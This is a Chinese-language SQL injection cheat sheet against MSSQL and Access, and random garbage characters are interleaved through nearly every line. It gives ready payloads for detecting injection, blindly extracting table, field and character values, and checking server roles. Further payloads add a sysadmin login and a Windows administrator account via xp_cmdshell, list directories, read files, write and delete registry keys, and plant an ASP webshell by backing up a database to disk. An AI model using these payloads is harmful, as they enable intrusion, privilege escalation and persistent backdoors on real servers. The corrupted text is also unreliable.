1.判断是否有注入;and 1=1 ;and 1=2 39�{{7(�hh
2.初步判断是否是mssql ;and user>0 )p�w&�c�_x
*�%�Q��n{x
3.注入参数是字符'and [查询条件] and ''=' �s08u� ��@
r�z�p�� +:
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,��mP�nQ?
Oo?,f�w���
5.判断数据库系统 4E44Hzs���
�Y�+/JsO�D
;and (select count(*) from sysobjects)>0 mssql ��D .vw8H3
j�Q�U"Ved�
;and (select count(*) from msysobjects)>0 access K�!D�
o�8|
P?�BGB�bC�
{f9{8-W�<u
0��o�y-�os
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �j��Clj_�E
]0D}T'wM��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [�6jbg�W~E
ThW,Y"�
�l
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 @1zQce���>
K}�[>�T(0E
9.(1)猜字段的ascii值(access) c�YNJh�G�Y
�,?
E&V�_5
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �9iN.3/T8
�H�G/p$�L*
(2)猜字段的ascii值(mssql) #� �N~,F@t
w",?
�Bef
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 F#xa��`*AP
�O�u'?]{�
10.测试权限结构(mssql) l���0�*�Gb
}a�wz��O#�
?������_\$
�4^�6.�~6a
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 7dihV�vL
$
Q�bhW�!9(,
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- DaNW�~rd�{
wo�5���ZxM
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ^s\3/z>b4!
�q���d�CWy
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��{Hr$wa�~
wL�u�v6\E
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- _eLWQ|6�Fx
�59�(U�`�X
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- f��Jjgq)�9
iq?#rb P#I
;and 1=(select IS_MEMBER('db_owner'));-- ~Lfcg���*�
P[t�$\�F�S
-6T�k<�W�
@|b�P+8�oU
11.添加mssql和系统的帐户 33:DH}����
�P+e��KZ�o
;exec master.dbo.sp_addlogin username;-- 7#;�vG��>]
;exec master.dbo.sp_password null,username,password;-- X
fz�`^x>M
j-]&'�-h}#
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �QzGV.Mt�2
%I�L�6i�x�
;exec master.dbo.xp_cmdshell 'net user username password �k�fC0z�d+
B68H&h]D#'
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 4{�9d#[KW�
x�@�P{l&:>
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 6FfOH<\z6i
���}�:iBx�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- b|^��I<�7�
�wh 0<U�v�
z�H)_v�W��
9-��*NW��0
12.(1)遍历目录 4C~Uc�GMv\
"�
o�y\_1|
;create table dirs(paths varchar(100), id int) jm��>3�b�d
H�r;h4��J�
;insert dirs exec master.dbo.xp_dirtree 'c:\' B�7�Ntk�MK
5,+\`�!g��
;and (select top 1 paths from dirs)>0 �qZ2&Xw.{1
S��cnY3&rc
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ~>ME'�D�~
%@&�a7�JOL
{I%�y;Aab8
�jigs���6#
(2)遍历目录 �I�yk6=&?j
t�[.W$1=�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- U`��R;P�-�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �!7H6�i#g*
z�Ljg�CS<7
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Z�I�xRyo-i
]X�Ul@Y. �
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �r�$)�$n&j
�;##]G��=%
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 lXr�D�!1F
g: �%9j��f
"#�^MUQ�!a
�O]u"�,J�5
13.mssql中的存储过程 7��r{qJ7$%
kL{;.��WsB
xp_regenumvalues 注册表根键, 子键 T)�u4S[
&�
�s(@h �2:j
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 wV�<��7�pi
&�R�$Q\�,�
xp_regread 根键,子键,键值名 �kv�|�,b�
-$Y8�!5�4�
;exec xp_regread ^,s?e.u$8`
fhp�X/WE6�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 dK�?);�*w]
&TN2 HZ-bJ
xp_regwrite 根键,子键, 值名, 值类型, 值 Yt1mB[&f^
N}�/�>r��D
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 !o�SLl.fQd
4-�4�?IwS�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 H;vZm[\0N-
QrjDF>� ��
xp_regdeletevalue 根键,子键,值名 Rm���h*TQu
Vk<k��+�=7
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �\&�|CM�8A
?_4^le[;��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 :�F|\Ij�0T
M$�#s�c`4*
�=DgC��C|p
\d68-JS@�~
14.mssql的backup创建webshell E1q%gi4�Q%
;"7/@�&M\m
use model �^KHLBSc�:
3�l:X�hLOj
create table cmd(str image); 6OUvrfC�(H
��U�^#?&u�
insert into cmd(str) values (''); U~is�-+�Uq
Y5TS>iEE]�
backup database model to disk='c:\l.asp'; �s�wr"k6;G
�;x[��pM_�
���"�)\aJ8
eqzTQen8q
15.mssql内置函数 =����t+�('
)�5l u.R%
;and (select @@version)>0 获得Windows的版本号 ~@M�7�&%�]
k&Jo"[i&WO
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �r%MyR8'k]
�R�$�0U<(/
;and (select user_name())>0 爆当前系统的连接用户 t{(Mf2GR1
�2;�(W-]V?
;and (select db_name())>0 得到当前连接的数据库 ZxSs��R�{�
�Bhuw(K�eB
�$a�d&#�q7
�Z.jCer�a.
16.简洁的webshell ��gA
+:CgQ
O�D�4W}Y.�
use model j�b�@\i�@-
_
�VK�gs]Y
create table cmd(str image); e��dN8-P�(
z-���H�kz�
insert into cmd(str) values (''); >}]H;�&
l�
U1\MA6pXW
backup database model to disk='g:\wwwtest\l.asp';
